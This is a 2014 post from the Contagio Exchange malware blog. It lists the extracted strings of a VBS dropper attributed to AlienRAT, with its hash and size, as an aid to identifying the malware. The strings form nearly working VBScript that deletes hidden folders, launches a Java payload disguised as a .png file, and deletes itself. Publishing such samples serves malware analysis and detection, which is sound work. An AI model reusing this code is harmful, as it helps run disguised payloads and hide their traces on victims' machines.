About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become s useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Monday, November 17, 2014

OiuFr7LcfXq1847924646026958055.vbs - AlienRAT dropped VBS

Note: Laura is the user name on the sandbox

File: OiuFr7LcfXq1847924646026958055.vbs
MD5:  9e1ede0dedadb7af34c0222ada2d58c9
Size: 1542

Ascii Strings:
on error resume next
Wscript.sleep 5000
Dim oShell
Dim sFunction
Set oShell = WScript.CreateObject ("WSCript.shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd""",0
objFSO.DeleteFile("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd"),TRUE
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f""",0
Wscript.sleep 5000
objFSO.DeleteFile("C:\Documents and Settings\Laura\.m4w6OAI02f\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\.m4w6OAI02f"),TRUE
oShell.run """C:\Program Files\Java\jre7\bin\javaw.exe"" -jar ""C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png"""
Wscript.sleep 3000
Set oShell = Nothing
Set objFSO = Nothing
sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & WScript.ScriptFullName & Chr(34)

